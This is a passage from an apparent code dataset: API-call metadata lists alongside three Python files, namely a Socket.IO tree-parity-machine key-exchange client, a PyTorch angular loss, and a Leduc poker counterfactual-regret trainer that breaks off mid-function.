'plt.ylabel', (['"""Fraction / bin"""'], {}), "('Fraction / bin')\n", (4736, 4754), True, 'import matplotlib.pylab as plt\n'), ((4759, 4776), 'matplotlib.pylab.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (4769, 4776), True, 'import matplotlib.pylab as plt\n'), ((4920, 4995), 
'matplotlib.pylab.legend', 'plt.legend', (['[handles[idx] for idx in order]', '[labels[idx] for idx in order]'], {}), '([handles[idx] for idx in order], [labels[idx] for idx in order])\n', (4930, 4995), True, 'import matplotlib.pylab as plt\n'), ((382, 406), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (396, 406), False, 'import csv\n'), ((560, 582), 'numpy.sum', 'np.sum', (['(x_list_ * data)'], {}), '(x_list_ * data)\n', (566, 582), True, 'import numpy as np\n'), ((585, 597), 'numpy.sum', 'np.sum', (['data'], {}), '(data)\n', (591, 597), True, 'import numpy as np\n'), ((698, 744), 'numpy.exp', 'np.exp', (['(-(x_list_ - x) ** 2 / (2 * width ** 2))'], {}), '(-(x_list_ - x) ** 2 / (2 * width ** 2))\n', (704, 744), True, 'import numpy as np\n'), ((1807, 1828), 'matplotlib.use', 'matplotlib.use', (['"""SVG"""'], {}), "('SVG')\n", (1821, 1828), False, 'import matplotlib\n'), ((2313, 2338), 'math.ceil', 'math.ceil', (['(max_point / 25)'], {}), '(max_point / 25)\n', (2322, 2338), False, 'import math\n'), ((4125, 4173), 'math.log', 'math.log', (['gaussian_val_just_before_np_median', '(10)'], {}), '(gaussian_val_just_before_np_median, 10)\n', (4133, 4173), False, 'import math\n'), ((4428, 4454), 'math.log', 'math.log', (['max_fraction', '(10)'], {}), '(max_fraction, 10)\n', (4436, 4454), False, 'import math\n'), ((5124, 5180), 'matplotlib.pylab.savefig', 'plt.savefig', (['filepath'], {'format': '"""svg"""', 'bbox_inches': '"""tight"""'}), "(filepath, format='svg', bbox_inches='tight')\n", (5135, 5180), True, 'import matplotlib.pylab as plt\n'), ((5199, 5209), 'matplotlib.pylab.show', 'plt.show', ([], {}), '()\n', (5207, 5209), True, 'import matplotlib.pylab as plt\n'), ((902, 972), 'argparse.HelpFormatter', 'argparse.HelpFormatter', (['prog'], {'max_help_position': 'columns', 'width': 'columns'}), '(prog, max_help_position=columns, width=columns)\n', (924, 972), False, 'import argparse\n'), ((3677, 3686), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (3684, 3686), True, 'import matplotlib.pylab as plt\n'), ((4853, 4862), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (4860, 4862), True, 'import matplotlib.pylab as plt\n'), ((625, 658), 'numpy.sum', 'np.sum', (['((x_list_ - x) ** 2 * data)'], {}), '((x_list_ - x) ** 2 * data)\n', (631, 658), True, 'import numpy as np\n'), ((661, 673), 'numpy.sum', 'np.sum', (['data'], {}), '(data)\n', (667, 673), True, 'import numpy as np\n')]
|
# from socketIO_client import SocketIO, LoggingNamespace
import sys
import socketio
import numpy as np
import math
from random import randrange
sio = socketio.Client()
@sio.on('receive_chaos_output2')
def on_receive_chaos_output2(msg):
if msg['output'] == tpmclient.tpm.chaosmap():
tpmclient.IsSync = True
print('SUCCESS: synched with Bob')
sio.disconnect()
tpmclient.save_key()
# save key to KEYS
@sio.on('receive_chaos_output')
def on_receive_chaos_output(msg):
sio.emit('confirm_chaos_output',
{
'msg':'sending chaos output',
'output': tpmclient.tpm.chaosmap(),
'sid': tpmclient.partner_sid
}
)
if msg['output'] == tpmclient.tpm.chaosmap():
tpmclient.IsSync = True
print('SUCCESS: synched with Alice')
sio.disconnect()
tpmclient.save_key()
# save key to KEYS
@sio.on('output_received')
def on_output_received(msg):
if tpmclient.tpm.out == msg['output']:
tpmclient.tpm.update_weights(msg['output'])
if tpmclient.n >= 200:
if tpmclient.n % 10 == 0:
tpmclient.send_chaos_output()
if not tpmclient.IsSync:
tpmclient.send_vector_and_output()
# print("output received", + msg['output'])
animation.update()
@sio.on('get_weights')
def on_get_weights(msg):
try:
vector = msg['vector']
list_vec = [np.array(vector[x:x+16]) for x in range(0, len(vector), 16)]
tpmclient.receive_vector(list_vec)
tpmclient.send_output()
if tpmclient.tpm.out == msg['output']:
tpmclient.tpm.update_weights(msg['output'])
# print("output received", + msg['output'])
animation.update()
except socketio.exceptions.BadNamespaceError:
pass
@sio.on('status')
def on_status(msg):
if 'assign Alice' in msg:
tpmclient.user = msg['assign Alice']
if 'assign Bob' in msg and not tpmclient.user:
tpmclient.user = msg['assign Bob']
if 'start' in msg:
if tpmclient.user == 'A':
tpmclient.partner_sid = msg["BSid"]
# print(' B sid is ' + tpmclient.partner_sid)
tpmclient.send_vector_and_output()
else:
tpmclient.partner_sid = msg["ASid"]
# print(' A sid is ' + tpmclient.partner_sid)
print("Partner's sid is: " + tpmclient.partner_sid)
# print('message from server: ' + msg['message'])
@sio.event
def connect():
sio.emit('my message', " Client connected", namespace='/')
sio.emit('join', {'channel': CHANNEL}, namespace='/')
print("Connected to server")
class TPMClient:
def __init__(self):
self.user = None
self.tpm = TPM(16, 16, 100)
self.n = 0
self.IsSync = False
def send_vector_and_output(self):
vector = self.rand_vec()
list_vec = [np.array(vector[x:x+16]) for x in range(0, len(vector), 16)]
self.tpm.get_output(list_vec)
sio.emit('weights',
{
'msg':'sending random vector and output',
'vector': vector,
'output': self.tpm.out,
'sid': tpmclient.partner_sid
}
)
self.n += 1
def receive_vector(self, vector_):
vec = [np.array(x) for x in vector_]
self.tpm.get_output(vec)
def rand_vec(self):
l = []
for i in range(256):
l.append(randrange(-100, 100))
return l
def send_output(self):
sio.emit('send_output',
{
'msg':'sending output',
'output': self.tpm.out,
'sid': tpmclient.partner_sid
}
)
def send_chaos_output(self):
sio.emit('send_chaos_output',
{
'msg':'sending chaos output',
'output': self.tpm.chaosmap(),
'sid': tpmclient.partner_sid
}
)
def save_key(self):
re = [abs(item+155) for sublist in self.tpm.weights for item in sublist]
key = bytes(abs(x) for x in re).decode('cp437')
with open("KEYS/{}.txt".format(CHANNEL), "w") as text_file:
print(key, file=text_file)
class TPM:
def __init__(self, k_, n_, l_):
self.k = k_
self.n = n_
self.l = l_
self.weights = self.initialize_w()
self.inputs = None
self.H = np.zeros(self.k)
self.out = None
self.X = None
def get_output(self, input_):
self.X = input_
self.out = 1
for i in range(self.k):
            self.H[i] = self.signum(np.dot(input_[i], self.weights[i]))
            self.out *= self.H[i]
def initialize_w(self):
p = []
for i in range(self.k):
p.append(np.random.randint(-self.l, self.l, size=self.n))
return p
def signum(self, x):
return math.copysign(1, x)
def update_weights(self, outputB):
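        # (added note) Hebbian-style TPM rule: a weight moves by X[i][j] * out only when
        # this machine's output matches both its own hidden unit H[i] and the partner's
        # output outputB; g() then clips the result to the allowed range [-l, l].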
for i in range(self.k):
for j in range(self.n):
self.weights[i][j] += self.X[i][j] * self.out * self.isequal(self.out, self.H[i]) * self.isequal(self.out, outputB)
self.weights[i][j] = self.g(self.weights[i][j])
def isequal(self, A, B):
if A==B:
return 1.0
else:
return 0.0
def g(self, w):
if w > self.l:
return self.l
if w < -self.l:
return -self.l
else:
return w
def chaosmap(self):
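        # (added note) derives a scalar fingerprint of the weights: the seed
        # t = |sum(w)| / sum(|w|) is iterated through a logistic-style map
        # x <- (3.6 + t/2) * x * (1 - x), which is used as a cheap check that
        # the two parties' weight matrices agree.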
r = sum(list(np.hstack(self.weights)))
rr = sum([abs(x) for x in (list(np.hstack(self.weights)))])
t = float(abs(r)) / float(rr)
x = t
for i in range(rr):
x = (3.6 + t/2)* x *(1 - x)
return x
class Animation:
def __init__(self):
self.animation = [
"Synchronizing [ ]",
"Synchronizing [= ]",
"Synchronizing [=== ]",
"Synchronizing [==== ]",
"Synchronizing. [===== ]",
"Synchronizing. [====== ]",
"Synchronizing. [======= ]",
"Synchronizing. [========]",
"Synchronizing.. [ =======]",
"Synchronizing.. [ ======]",
"Synchronizing.. [ =====]",
"Synchronizing.. [ ====]",
"Synchronizing...[ ===]",
"Synchronizing...[ ==]",
"Synchronizing...[ =]",
"Synchronizing...[ ]",
"Synchronizing [ ]"]
self.i = 0
self.timer = None
def update(self):
print(self.animation[self.i % len(self.animation)], end='\r')
self.i += 1
if __name__ == "__main__":
CHANNEL = sys.argv[1]
tpmclient = TPMClient()
animation = Animation()
# sio.connect('https://tpmserver.herokuapp.com/')
sio.connect('http://localhost:5000')
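    # --- Hedged sketch (added; not part of the original client) -------------
    # How two TPMs would synchronise locally without the Socket.IO server,
    # using the same protocol as above (common random inputs, update only when
    # the outputs agree). All names below are the classes defined in this file.
    #
    #   tpm_a, tpm_b = TPM(16, 16, 100), TPM(16, 16, 100)
    #   for _ in range(5000):
    #       vec = [np.random.randint(-100, 100, size=16) for _ in range(16)]
    #       tpm_a.get_output(vec)
    #       tpm_b.get_output(vec)
    #       if tpm_a.out == tpm_b.out:
    #           tpm_a.update_weights(tpm_b.out)
    #           tpm_b.update_weights(tpm_a.out)
    #   print(tpm_a.chaosmap() == tpm_b.chaosmap())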
|
[
"socketio.Client",
"numpy.zeros",
"numpy.hstack",
"math.copysign",
"numpy.random.randint",
"numpy.array",
"random.randrange",
"numpy.dot"
] |
[((152, 169), 'socketio.Client', 'socketio.Client', ([], {}), '()\n', (167, 169), False, 'import socketio\n'), ((4404, 4420), 'numpy.zeros', 'np.zeros', (['self.k'], {}), '(self.k)\n', (4412, 4420), True, 'import numpy as np\n'), ((4928, 4947), 'math.copysign', 'math.copysign', (['(1)', 'x'], {}), '(1, x)\n', (4941, 4947), False, 'import math\n'), ((1398, 1424), 'numpy.array', 'np.array', (['vector[x:x + 16]'], {}), '(vector[x:x + 16])\n', (1406, 1424), True, 'import numpy as np\n'), ((2858, 2884), 'numpy.array', 'np.array', (['vector[x:x + 16]'], {}), '(vector[x:x + 16])\n', (2866, 2884), True, 'import numpy as np\n'), ((3276, 3287), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (3284, 3287), True, 'import numpy as np\n'), ((3429, 3449), 'random.randrange', 'randrange', (['(-100)', '(100)'], {}), '(-100, 100)\n', (3438, 3449), False, 'from random import randrange\n'), ((4616, 4650), 'numpy.dot', 'np.dot', (['input_[i]', 'self.weights[i]'], {}), '(input_[i], self.weights[i])\n', (4622, 4650), True, 'import numpy as np\n'), ((4688, 4722), 'numpy.dot', 'np.dot', (['input_[i]', 'self.weights[i]'], {}), '(input_[i], self.weights[i])\n', (4694, 4722), True, 'import numpy as np\n'), ((4821, 4868), 'numpy.random.randint', 'np.random.randint', (['(-self.l)', 'self.l'], {'size': 'self.n'}), '(-self.l, self.l, size=self.n)\n', (4838, 4868), True, 'import numpy as np\n'), ((5561, 5584), 'numpy.hstack', 'np.hstack', (['self.weights'], {}), '(self.weights)\n', (5570, 5584), True, 'import numpy as np\n'), ((5628, 5651), 'numpy.hstack', 'np.hstack', (['self.weights'], {}), '(self.weights)\n', (5637, 5651), True, 'import numpy as np\n')]
|
import torch
import torch.nn as nn
import numpy as np
def Angular(margin):#angular mc
#https://github.com/ronekko/deep_metric_learning/blob/master/lib/functions/angular_loss.py
return AngularLoss(margin=margin)
class AngularLoss(nn.Module):
def __init__(self,margin):
super(AngularLoss, self).__init__()
self.margin = margin
def forward(self, embedding, label):
batch_size=embedding.size(0)
embed_anchor=embedding[0:batch_size//2,:]
embed_pos=embedding[batch_size//2:batch_size,:]
alpha = np.deg2rad(self.margin)
sq_tan_alpha = torch.tan(torch.from_numpy(alpha.reshape(1,1)).float().cuda()[0][0]) ** 2
n_pairs = embed_anchor.size()[0]
# first and second term of f_{a,p,n}
term1 = 4 * sq_tan_alpha * (embed_anchor + embed_pos).mm(embed_pos.transpose(0, 1))
term2 = 2 * (1 + sq_tan_alpha) * (embed_pos*embed_anchor).sum(dim=1)
f_apn = term1-term2.repeat(n_pairs,1)
mask = torch.ones(n_pairs,n_pairs)-torch.eye(n_pairs,n_pairs)
f_apn = f_apn*mask.cuda()
loss = f_apn.exp().sum(dim=1).log().mean()
return loss,0,0
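# Hedged usage sketch (added; not part of the original file). forward() expects the
# first half of the batch to be anchors and the second half the matching positives,
# and it calls .cuda() internally, so a CUDA device is required.
if __name__ == "__main__":
    if torch.cuda.is_available():
        criterion = Angular(margin=45)
        embedding = nn.functional.normalize(torch.randn(8, 128), dim=1).cuda()
        label = torch.arange(4).repeat(2).cuda()  # unused by this loss, kept for the signature
        loss, _, _ = criterion(embedding, label)
        print(loss.item())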
|
[
"torch.ones",
"torch.eye",
"numpy.deg2rad"
] |
[((557, 580), 'numpy.deg2rad', 'np.deg2rad', (['self.margin'], {}), '(self.margin)\n', (567, 580), True, 'import numpy as np\n'), ((998, 1026), 'torch.ones', 'torch.ones', (['n_pairs', 'n_pairs'], {}), '(n_pairs, n_pairs)\n', (1008, 1026), False, 'import torch\n'), ((1026, 1053), 'torch.eye', 'torch.eye', (['n_pairs', 'n_pairs'], {}), '(n_pairs, n_pairs)\n', (1035, 1053), False, 'import torch\n')]
|
#Library
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import random
import itertools
import doctest
import copy
import math
import wandb
from tqdm import tqdm
from collections import defaultdict
#Node Class
#information set node class definition
class Node:
#1 #Leduc_node_definitions
def __init__(self, NUM_ACTIONS, infoSet, num_players=2):
self.NUM_ACTIONS = NUM_ACTIONS
self.NUM_PLAYERS = num_players
self.infoSet = infoSet
self.c = 0
self.regretSum = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.strategy = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.strategySum = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.possible_action = self.Get_possible_action_by_information_set()
self.Get_strategy_through_regret_matching()
def Get_possible_action_by_information_set(self): #{0:"f", 1:"c", 2:"r"}
"""return int
>>> Node(3, "JccKc").Get_possible_action_by_information_set()
array([1, 2])
>>> Node(3, "Jr").Get_possible_action_by_information_set()
array([0, 1, 2])
>>> Node(3, "JccJc").Get_possible_action_by_information_set()
array([1, 2])
>>> Node(3, "J").Get_possible_action_by_information_set()
array([1, 2])
"""
infoset_without_hand_card = self.infoSet[1:]
if LeducTrainer().card_num_check(infoset_without_hand_card) == 1:
private_cards, history_before, community_card, history_after = LeducTrainer().Split_history("??" + infoset_without_hand_card)
infoset_without_hand_card = history_after
if len(infoset_without_hand_card) == 0 or infoset_without_hand_card.count("r") == 0:
return np.array([1,2], dtype=int)
elif infoset_without_hand_card.count("r") == 1:
return np.array([0,1,2], dtype=int)
elif infoset_without_hand_card.count("r") == 2:
return np.array([0,1], dtype=int)
#regret-matching
def Get_strategy_through_regret_matching(self):
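    # (added note) regret matching: play each action in proportion to its positive
    # cumulative regret. e.g. regretSum = [2, -1, 1] over {f, c, r} clips to
    # [2, 0, 1] and normalises to [2/3, 0, 1/3]; with no positive regret the
    # strategy falls back to uniform over the legal actions.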
self.normalizingSum = 0
for a in self.possible_action:
self.strategy[a] = self.regretSum[a] if self.regretSum[a]>0 else 0
self.normalizingSum += self.strategy[a]
for a in self.possible_action:
if self.normalizingSum >0 :
self.strategy[a] /= self.normalizingSum
else:
self.strategy[a] = 1/len(self.possible_action)
# calculate average-strategy
def Get_average_information_set_mixed_strategy(self):
self.avgStrategy = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.normalizingSum = 0
for a in self.possible_action:
self.normalizingSum += self.strategySum[a]
for a in self.possible_action:
if self.normalizingSum >0 :
self.avgStrategy[a] = self.strategySum[a] / self.normalizingSum
else:
self.avgStrategy[a] = 1/len(self.possible_action)
return self.avgStrategy
# Leduc Trainer
class LeducTrainer:
def __init__(self, train_iterations=10, num_players = 2):
#f: FOLD, c: CALL , r:RAISE
self.train_iterations = train_iterations
self.NUM_PLAYERS = num_players
self.ACTION_DICT = {0:"f", 1:"c", 2:"r"}
self.NUM_ACTIONS = 3
self.nodeMap = defaultdict(list)
self.eval = None
self.card_rank = self.make_rank()
def make_rank(self):
"""return dict
>>> LeducTrainer(num_players=2).make_rank() == {"KK":6, "QQ":5, "JJ":4, "KQ":3, "QK":3, "KJ":2, "JK":2, "QJ":1, "JQ":1}
True
"""
card_deck = self.card_distribution()
card_unique = card_deck[::2]
card_rank = {}
count = (len(card_unique)-1)*len(card_unique) //2
for i in range(len(card_unique)-1,-1, -1):
for j in range(i-1, -1, -1):
card_rank[card_unique[i] + card_unique[j]] = count
card_rank[card_unique[j] + card_unique[i]] = count
count -= 1
count = (len(card_unique)-1)*len(card_unique) //2 +1
for i in range(len(card_unique)):
card_rank[card_unique[i] + card_unique[i]] = count
count += 1
return card_rank
def Rank(self, my_card, com_card):
"""return int
>>> LeducTrainer(num_players=2).Rank("J", "Q")
1
>>> LeducTrainer(num_players=2).Rank("Q", "J")
1
>>> LeducTrainer(num_players=2).Rank("K", "K")
6
"""
hand = my_card + com_card
return self.card_rank[hand]
def card_distribution(self):
"""return list
>>> LeducTrainer(num_players=2).card_distribution()
['J', 'J', 'Q', 'Q', 'K', 'K']
>>> LeducTrainer(num_players=3).card_distribution()
['T', 'T', 'J', 'J', 'Q', 'Q', 'K', 'K']
"""
card = ["2", "3", "4", "5", "6", "7", "8", "9", "T", "J", "Q", "K"]
card_deck = []
for i in range(self.NUM_PLAYERS+1):
card_deck.append(card[11-self.NUM_PLAYERS+i])
card_deck.append(card[11-self.NUM_PLAYERS+i])
return card_deck
def Split_history(self, history):
"""return history_before, history_after
>>> LeducTrainer(num_players=3).Split_history("JKQcccKcrcc")
('JKQ', 'ccc', 'K', 'crcc')
>>> LeducTrainer(num_players=2).Split_history("KQrrcQrrc")
('KQ', 'rrc', 'Q', 'rrc')
>>> LeducTrainer(num_players=2).Split_history("QQcrrcKcc")
('QQ', 'crrc', 'K', 'cc')
"""
for ai, history_ai in enumerate(history[self.NUM_PLAYERS:]):
if history_ai in self.card_distribution():
idx = ai+self.NUM_PLAYERS
        community_card = history_ai
        return history[:self.NUM_PLAYERS], history[self.NUM_PLAYERS:idx], community_card, history[idx+1:]
def action_history_player(self, history):
    # action history of target_player_i
player_action_list = [[] for _ in range(self.NUM_PLAYERS)]
player_money_list_round1 = [1 for _ in range(self.NUM_PLAYERS)]
player_money_list_round2 = [0 for _ in range(self.NUM_PLAYERS)]
f_count, a_count, raise_count = 0, 0, 0
card = self.card_distribution()
private_cards, history_before, community_card, history_after = self.Split_history(history)
for hi in history_before:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
if hi == "c":
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round1)
elif hi == "r" and raise_count == 0:
raise_count += 1
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 2
elif hi == "r" and raise_count == 1:
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 4
a_count += 1
f_count, a_count, raise_count = 0, 0, 0
for hi in history_after:
if hi not in card:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
if hi == "c":
player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round2)
elif hi == "r" and raise_count == 0:
raise_count += 1
player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] += 4
elif hi == "r" and raise_count == 1:
player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] += 8
a_count += 1
return player_action_list, player_money_list_round1, player_money_list_round2, community_card
def action_player(self, history):
"""return int
>>> LeducTrainer().action_player("JJc")
1
>>> LeducTrainer().action_player("JQcr")
0
>>> LeducTrainer(num_players=3).action_player("JQTrfr")
0
"""
player_action_list = [[] for _ in range(self.NUM_PLAYERS)]
a_count = 0
f_count = 0
if self.card_num_check(history) == self.NUM_PLAYERS:
for hi in history[self.NUM_PLAYERS:]:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
a_count += 1
elif self.card_num_check(history) == self.NUM_PLAYERS+1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
for hi in history_after:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
a_count += 1
return (a_count + f_count)%self.NUM_PLAYERS
#6 Return payoff for terminal states #if terminal states return util
def Return_payoff_for_terminal_states(self, history, target_player_i):
"""return int
>>> int(LeducTrainer().Return_payoff_for_terminal_states("KQrf", 0))
1
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKcrf", 0))
-1
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrf", 0))
-3
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JJccQcc", 0))
0
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JKccQcc", 1))
1
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JQcrcKcrc", 0))
-7
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JQcrcKcrc", 1))
7
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQrrf", 0))
-9
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQrrc", 0))
13
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQcc", 0))
5
"""
#round1 finish
if history.count("f") == self.NUM_PLAYERS -1 and self.card_num_check(history) == self.NUM_PLAYERS:
player_action_list = [[] for _ in range(self.NUM_PLAYERS)]
player_money_list_round1 = [1 for _ in range(self.NUM_PLAYERS)]
player_money_list_round2 = [0 for _ in range(self.NUM_PLAYERS)]
f_count, a_count, raise_count = 0, 0, 0
for hi in history[self.NUM_PLAYERS:]:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
if hi == "c":
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round1)
elif hi == "r" and raise_count == 0:
raise_count += 1
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 2
elif hi == "r" and raise_count == 1:
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 4
a_count += 1
if len(player_action_list[target_player_i]) >= 1 and player_action_list[target_player_i][-1] == "f":
return -player_money_list_round1[target_player_i]
else:
return sum(player_money_list_round1) -player_money_list_round1[target_player_i]
#round2 finish
#target_player_i action history
player_action_list, player_money_list_round1, player_money_list_round2, community_card = self.action_history_player(history)
# target_player_i :fold
if player_action_list[target_player_i][-1] == "f":
return -player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
    # everyone else folded
last_play =[hi[-1] for idx, hi in enumerate(player_action_list) if idx != target_player_i]
if last_play.count("f") == self.NUM_PLAYERS - 1:
return sum(player_money_list_round1) + sum(player_money_list_round2) - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
#show down
show_down_player =[idx for idx, hi in enumerate(player_action_list) if hi[-1] != "f"]
show_down_player_card = {}
for idx in show_down_player:
show_down_player_card[idx] = self.Rank(history[idx], community_card)
max_rank = max(show_down_player_card.values())
if show_down_player_card[target_player_i] != max_rank:
return - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
else:
win_num = len([idx for idx, card_rank in show_down_player_card.items() if card_rank == max_rank])
return float((sum(player_money_list_round1) + sum(player_money_list_round2))/win_num) - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
# whetther terminal_states
def whether_terminal_states(self, history):
"""return string
>>> LeducTrainer().whether_terminal_states("JKccKr")
False
>>> LeducTrainer().whether_terminal_states("QJccJcc")
True
>>> LeducTrainer().whether_terminal_states("QQcr")
False
>>> LeducTrainer(num_players=3).whether_terminal_states("QKTrff")
True
>>> LeducTrainer(num_players=3).whether_terminal_states("KKTcccQcrcrcc")
True
"""
if history.count("f") == self.NUM_PLAYERS -1 :
return True
if self.card_num_check(history) == self.NUM_PLAYERS +1 :
private_cards, history_before, community_card, history_after = self.Split_history(history)
if history_after.count("r") == 0 and history_after.count("c") == self.NUM_PLAYERS:
return True
if history.count("r") >=1 :
idx = 0
for i,hi in enumerate(history_after):
if hi == "r":
idx = i
if history_after[idx+1:].count("c") == self.NUM_PLAYERS -1 :
return True
return False
def card_num_check(self, history):
"""return string
>>> LeducTrainer(num_players=3).card_num_check("JKTccc")
3
>>> LeducTrainer(num_players=2).card_num_check("KQcr")
2
"""
cards = self.card_distribution()
count = 0
for hi in history:
if hi in cards:
count += 1
return count
def whether_chance_node(self, history):
"""return string
>>> LeducTrainer().whether_chance_node("JKcc")
True
>>> LeducTrainer().whether_chance_node("KQcr")
False
>>> LeducTrainer().whether_chance_node("")
True
>>> LeducTrainer(num_players=3).whether_chance_node("KQTcc")
False
"""
if history == "":
return True
if self.card_num_check(history) == self.NUM_PLAYERS :
if history.count("r") == 0 and history.count("c") == self.NUM_PLAYERS:
return True
if history.count("r") >=1 :
idx = 0
for i,hi in enumerate(history):
if hi == "r":
idx = i
if history[idx+1:].count("c") == self.NUM_PLAYERS -1 :
return True
return False
#make node or get node
def Get_information_set_node_or_create_it_if_nonexistant(self, infoSet):
node = self.nodeMap.get(infoSet)
if node == None:
node = Node(self.NUM_ACTIONS, infoSet, self.NUM_PLAYERS)
self.nodeMap[infoSet] = node
return node
#chance sampling CFR
def chance_sampling_CFR(self, history, target_player_i, iteration_t, p_list):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i)
elif self.whether_chance_node(history):
if len(history) == 0:
self.cards = self.card_distribution()
random.shuffle(self.cards)
nextHistory = "".join(self.cards[:self.NUM_PLAYERS])
return self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list)
else:
nextHistory = history + self.cards[self.NUM_PLAYERS]
return self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
nodeUtil = 0
node.Get_strategy_through_regret_matching()
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
p_change[player] = node.strategy[ai]
util_list[ai] = self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list * p_change)
nodeUtil += node.strategy[ai] * util_list[ai]
if player == target_player_i:
for ai in node.possible_action:
regret = util_list[ai] - nodeUtil
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
node.regretSum[ai] += p_exclude * regret
node.strategySum[ai] += node.strategy[ai] * p_list[player]
return nodeUtil
#chance sampling CFR
def vanilla_CFR(self, history, target_player_i, iteration_t, p_list):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i)
elif self.whether_chance_node(history):
if len(history) == 0:
cards = self.card_distribution()
cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS+1)]
utility_sum = 0
for cards_i in cards_candicates:
self.cards_i = cards_i
nextHistory = "".join(cards_i[:self.NUM_PLAYERS])
utility_sum += (1/len(cards_candicates))* self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list)
return utility_sum
else:
nextHistory = history + self.cards_i[self.NUM_PLAYERS]
return self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
node.Get_strategy_through_regret_matching()
util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
nodeUtil = 0
if not self.eval:
strategy = node.strategy
else:
strategy = node.Get_average_information_set_mixed_strategy()
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
p_change[player] = strategy[ai]
util_list[ai] = self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list * p_change)
nodeUtil += strategy[ai] * util_list[ai]
if (not self.eval) and player == target_player_i:
for ai in node.possible_action:
regret = util_list[ai] - nodeUtil
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
node.regretSum[ai] += p_exclude * regret
node.strategySum[ai] += strategy[ai] * p_list[player]
return nodeUtil
#external sampling MCCFR
def external_sampling_MCCFR(self, history, target_player_i):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i)
elif self.whether_chance_node(history):
if len(history) == 0:
self.cards = self.card_distribution()
random.shuffle(self.cards)
nextHistory = "".join(self.cards[:self.NUM_PLAYERS])
return self.external_sampling_MCCFR(nextHistory, target_player_i)
else:
nextHistory = history + self.cards[self.NUM_PLAYERS]
return self.external_sampling_MCCFR(nextHistory, target_player_i)
infoSet = history[player] + history[self.NUM_PLAYERS:]
